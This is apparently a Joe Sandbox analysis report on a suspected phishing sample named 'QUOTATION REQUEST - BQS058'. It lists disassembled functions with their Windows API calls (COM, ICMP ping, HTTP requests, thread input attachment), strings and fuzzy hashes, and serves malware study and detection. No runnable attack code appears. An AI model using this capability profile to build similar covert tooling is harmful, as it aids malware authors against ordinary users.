Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC

CoInitialize.OLE32 ref: 01048403
CoUninitialize.OLE32 ref: 0104840E
CoCreateInstance.OLE32(?,00000000,00000017,01062BEC,?), ref: 0104846E
IIDFromString.OLE32(?,?), ref: 010484E1
VariantInit.OLEAUT32(?), ref: 0104857B
VariantClear.OLEAUT32(?), ref: 010485DC

Strings

NULL Pointer assignment, xrefs: 010484B3
Failed to create object, xrefs: 01048479, 0104852F
Invalid parameter, xrefs: 010484FA

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 87d12254714ce7844e4cd1d6fcf92bfcabf1520335908827ace76a419d6040e8
Instruction ID: 611462534cd02ac8a709d807e74979c6e3f74b39b8b96a02506d4e3ff52da265
Opcode Fuzzy Hash: 87d12254714ce7844e4cd1d6fcf92bfcabf1520335908827ace76a419d6040e8
Instruction Fuzzy Hash: FF6191B06083129FD711DF94C888B6EBBE4AF85754F04886EF9C19B291CB74ED44CB92

Function 01045732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 01045793
inet_addr.WSOCK32(?,?,?), ref: 010457D8
gethostbyname.WSOCK32(?), ref: 010457E4
IcmpCreateFile.IPHLPAPI ref: 010457F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01045862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01045878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 010458ED
WSACleanup.WSOCK32 ref: 010458F3

Strings

Ping, xrefs: 01045816

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 4207bbad65e6a840540575f3c828298ea2a443aa0aa974c2548e7d4a5bc2033a
Instruction ID: 544125c872351bd07cbfa5ce78f4a8aa0c47eccd8abbaf747c220b27f8f9408c
Opcode Fuzzy Hash: 4207bbad65e6a840540575f3c828298ea2a443aa0aa974c2548e7d4a5bc2033a
Instruction Fuzzy Hash: FC516E716043019FEB21EF68DC85B2A7BE4EF49720F04456AF996EB291DB74E900DB42

Function 0103B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0103B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0103B546
GetLastError.KERNEL32 ref: 0103B550
SetErrorMode.KERNEL32(00000000,READY), ref: 0103B5BD

Strings

UNKNOWN, xrefs: 0103B575
NOTREADY, xrefs: 0103B57C
READONLY, xrefs: 0103B588
READY, xrefs: 0103B596
INVALID, xrefs: 0103B58F

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 56b5cd28c616e1d3bc579222d024fb73d49ec2235eeade5d7d4c462e7c7dec67
Instruction ID: e7c64cd5fd1b297d376fc887f1f9cd862ecddfcda0148b41e146a4a622d0c0be
Opcode Fuzzy Hash: 56b5cd28c616e1d3bc579222d024fb73d49ec2235eeade5d7d4c462e7c7dec67
Instruction Fuzzy Hash: 9631C435A00205EFDB10EF68C885FAEBBB8FF85314F44815AE682DB2D1DB759A01CB41

Function 01028F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 01029014
GetDlgCtrlID.USER32 ref: 0102901F
GetParent.USER32 ref: 0102903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 0102903E
GetDlgCtrlID.USER32(?), ref: 01029047
GetParent.USER32(?), ref: 01029063
SendMessageW.USER32(00000000,?,?,00000111), ref: 01029066

Strings

ComboBox, xrefs: 01028F9C
ListBox, xrefs: 01028FD1

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: f264814351777a47b6f962e980be94a9b0db58e702794971658522908366cea0
Instruction ID: 83d862c6acafcf2b7e50e9b03003548b17ed7d8a94998724de442db67bc7559e
Opcode Fuzzy Hash: f264814351777a47b6f962e980be94a9b0db58e702794971658522908366cea0
Instruction Fuzzy Hash: 1A210370A00219BFDF10ABA4CC84EFEBBB5EF49310F00015AF9A1972A1DB3E5418DB20

Function 0102907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 010290FD
GetDlgCtrlID.USER32 ref: 01029108
GetParent.USER32 ref: 01029124
SendMessageW.USER32(00000000,?,00000111,?), ref: 01029127
GetDlgCtrlID.USER32(?), ref: 01029130
GetParent.USER32(?), ref: 0102914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 0102914F

Strings

ComboBox, xrefs: 01029087
ListBox, xrefs: 010290BC

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: fec89ad7c15a2aec308bd1a9c04d5d75cd33423c50472d8bbc4bd07e920bba3a
Instruction ID: 81079a0b8e0a87790135ae729015f38da67b15fb5b9f58a55d16c2a40cbbb655
Opcode Fuzzy Hash: fec89ad7c15a2aec308bd1a9c04d5d75cd33423c50472d8bbc4bd07e920bba3a
Instruction Fuzzy Hash: 9321C574A00219BBDF11ABA5CC85EFEBBB5EF48300F10405AF991972A5DB7E9419DB20

Function 01029163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0102916F
GetClassNameW.USER32(00000000,?,00000100), ref: 01029184
_wcscmp.LIBCMT ref: 01029196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 01029211

Strings

smallicons, xrefs: 010291D9
SHELLDLL_DefView, xrefs: 01029190
list, xrefs: 010291F3
details, xrefs: 010291BF
largeicons, xrefs: 010291A5

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 37ac460dc6d41c8ad4a78e28ee8ebae1b3a6d56794bd463661746080a2d5e6dd
Instruction ID: d6be6afb31adff16393be1cb8745aeae8f02233d404d4531ef08182643489310
Opcode Fuzzy Hash: 37ac460dc6d41c8ad4a78e28ee8ebae1b3a6d56794bd463661746080a2d5e6dd
Instruction Fuzzy Hash: 57115C3624833BB9FB213529DC0ADB737DC9F05324F30005AFAD0E40A7FE6655115694

Function 010488AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 010488D7
CoInitialize.OLE32(00000000), ref: 01048904
CoUninitialize.OLE32 ref: 0104890E
GetRunningObjectTable.OLE32(00000000,?), ref: 01048A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 01048B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01062C0C), ref: 01048B6F
CoGetObject.OLE32(?,00000000,01062C0C,?), ref: 01048B92
SetErrorMode.KERNEL32(00000000), ref: 01048BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01048C25
VariantClear.OLEAUT32(?), ref: 01048C35

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 9cd3b032615dca1fa8dde0fbe7dc0a7c158bf22fbba958e70f0dbf433967fab8
Instruction ID: 8b49a6f536a067ee5c19482d02b975da4316a996ef7057b09bb2d566958086c0
Opcode Fuzzy Hash: 9cd3b032615dca1fa8dde0fbe7dc0a7c158bf22fbba958e70f0dbf433967fab8
Instruction Fuzzy Hash: 5BC137B1608305AFD700EFA8C88492BBBE9FF89348F04496DF9859B251D771ED05CB52

Function 01037990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 01037A6C

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 59907a0dde7ef9b14415631af24af038f0d43e5a3d4c5ca825c03319371e62f1
Instruction ID: cefe169dcb8f44ebc7db5ed35ce67a5863ff7893cd6ef78e81ae5e58780ff240
Opcode Fuzzy Hash: 59907a0dde7ef9b14415631af24af038f0d43e5a3d4c5ca825c03319371e62f1
Instruction Fuzzy Hash: CCB1A4B591020A9FDB11DF98C884BBEBBF8FF89321F144469E681E7251D778E941CB90

Function 010311CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 010311F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,01030268,?,00000001), ref: 01031204
GetWindowThreadProcessId.USER32(00000000), ref: 0103120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01030268,?,00000001), ref: 0103121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0103122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01030268,?,00000001), ref: 01031245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01030268,?,00000001), ref: 01031257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,01030268,?,00000001), ref: 0103129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01030268,?,00000001), ref: 010312B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01030268,?,00000001), ref: 010312BC

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 430487bd01c0fc19bae7454d6f57ad9fb13bc79bca65e4dfccf092308c749ac4
Instruction ID: 038a33ddc69baf524bb2d5f70655cc326af77731eb49a0deeb01e1a02aa74772
Opcode Fuzzy Hash: 430487bd01c0fc19bae7454d6f57ad9fb13bc79bca65e4dfccf092308c749ac4
Instruction Fuzzy Hash: 4B318DB5600304BBEB319F68D898F6A7BEDBB8D311F108155F980C6186D7BE99508B60

Function 0100BDA2 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00FD2231
SetTextColor.GDI32(?,000000FF), ref: 00FD223B
SetBkMode.GDI32(?,00000001), ref: 00FD2250
GetStockObject.GDI32(00000005), ref: 00FD2258
GetClientRect.USER32(?), ref: 0100BDBB
SendMessageW.USER32(?,00001328,00000000,?), ref: 0100BDD2
GetWindowDC.USER32(?), ref: 0100BDDE
GetPixel.GDI32(00000000,?,?), ref: 0100BDED
ReleaseDC.USER32(?,00000000), ref: 0100BDFF
GetSysColor.USER32(00000005), ref: 0100BE1D

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 2f1cdd54a8dfd768e0a04aa82a3a836f36eaad3c9369fb36fea6729a78ac5f81
Instruction ID: 8ecc57d3d278e35a516036b620ff10ef2f6e4d926dbc52cb89ca4dfba41c2f28
Opcode Fuzzy Hash: 2f1cdd54a8dfd768e0a04aa82a3a836f36eaad3c9369fb36fea6729a78ac5f81
Instruction Fuzzy Hash: 8D217235500206AFEB615F74EC08BAA7BB1EB19332F104265FAA5951E5CB3A0951EF11

Function 00FDFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FDFAA6
OleUninitialize.OLE32(?,00000000), ref: 00FDFB45
UnregisterHotKey.USER32(?), ref: 00FDFC9C
DestroyWindow.USER32(?), ref: 010145D6
FreeLibrary.KERNEL32(?), ref: 0101463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 01014668

Strings

close all, xrefs: 00FDFAA1

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: fe49a0d824e376c4181582b4a751ec2f1c58e1890db9902a0b20639001dc91c3
Instruction ID: a1815a946f2a16ad4138bcf2bfbf6485a567f5f34cfc81a1398167db296d7321
Opcode Fuzzy Hash: fe49a0d824e376c4181582b4a751ec2f1c58e1890db9902a0b20639001dc91c3
Instruction Fuzzy Hash: 34A1BF31701212CFCB29EF14C994E69F7A5BF04714F1442AEE94AAB362CB38AD16DF51

Function 0102A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0102A439), ref: 0102A377

Strings

CLASS, xrefs: 0102A0F6
CLASSNN, xrefs: 0102A119
NAME, xrefs: 0102A1A9
INSTANCE, xrefs: 0102A285
TEXT, xrefs: 0102A2AE
REGEXPCLASS, xrefs: 0102A13C

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: ba3e22167ea244630445ddcf5d90a979a79528c9ecc5b524e1b8df4fad3a098f
Instruction ID: c42325796fcbd268e9e0d4afd1db017f385e8df2433f28742661e521682bc882
Opcode Fuzzy Hash: ba3e22167ea244630445ddcf5d90a979a79528c9ecc5b524e1b8df4fad3a098f
Instruction Fuzzy Hash: D9911630700626EBDB08EFA8C841BEDFBB5BF04310F54815AE9C9A7651DF346589DB90

Function 00FD2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00FD2EAE

Part of subcall function 00FD1DB3: GetClientRect.USER32(?,?), ref: 00FD1DDC
Part of subcall function 00FD1DB3: GetWindowRect.USER32(?,?), ref: 00FD1E1D
Part of subcall function 00FD1DB3: ScreenToClient.USER32(?,?), ref: 00FD1E45

GetDC.USER32 ref: 0100CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0100CD45
SelectObject.GDI32(00000000,00000000), ref: 0100CD53
SelectObject.GDI32(00000000,00000000), ref: 0100CD68
ReleaseDC.USER32(?,00000000), ref: 0100CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0100CDFB

Strings

U, xrefs: 0100CCD0

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: f71cd0e52c21a6cece7edcc8ef00a1d2c93b9a61e70286ffee0bd68f349ea4ac
Instruction ID: 045d05c335e8c1a7bb999026f5566b68ef82f06827ca55b3fbcda2102376f9b6
Opcode Fuzzy Hash: f71cd0e52c21a6cece7edcc8ef00a1d2c93b9a61e70286ffee0bd68f349ea4ac
Instruction Fuzzy Hash: 2C71C831500205DFEF629F68C984AEA7FB6FF48320F1843EBED955A296C7358841DB60

Function 01041A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01041A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01041A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 01041ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 01041AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01041AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 01041B10
InternetCloseHandle.WININET(00000000), ref: 01041B57

Part of subcall function 01042483: GetLastError.KERNEL32(?,?,01041817,00000000,00000000,00000001), ref: 01042498
Part of subcall function 01042483: SetEvent.KERNEL32(?,?,01041817,00000000,00000000,00000001), ref: 010424AD

Strings

, xrefs: 01041B01

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: e2de2f33190a0c07037e9cdf5a7df8a871a27b5d17213bf43e035b2e48835ec4
Instruction ID: 31ff3214860385029943efdd99b4a2a4bfb8ac75aeb7810a8d797c6996a90237
Opcode Fuzzy Hash: e2de2f33190a0c07037e9cdf5a7df8a871a27b5d17213bf43e035b2e48835ec4
Instruction Fuzzy Hash: 60417FB1500219BFEB129F54CC89FFB7BACFF08354F004166FA859A141E775AA948BA0

Function 01048C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0105F910), ref: 01048D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0105F910), ref: 01048D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 01048ED6
SysFreeString.OLEAUT32(?), ref: 01048F00

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 3b11e7d7f342134c12af2d08474409f127e4c77acdea8e4871fb2814541ae6a3
Instruction ID: 6d7828daf0e984e10929807d027ea5f45a67e3aced6b068adc13b19795368657
Opcode Fuzzy Hash: 3b11e7d7f342134c12af2d08474409f127e4c77acdea8e4871fb2814541ae6a3
Instruction Fuzzy Hash: 28F15EB1A00209EFDF54DF98C884EAEBBB5FF49314F1084A9F945AB251DB31AD45CB50

Function 0104F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0104F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0104F848
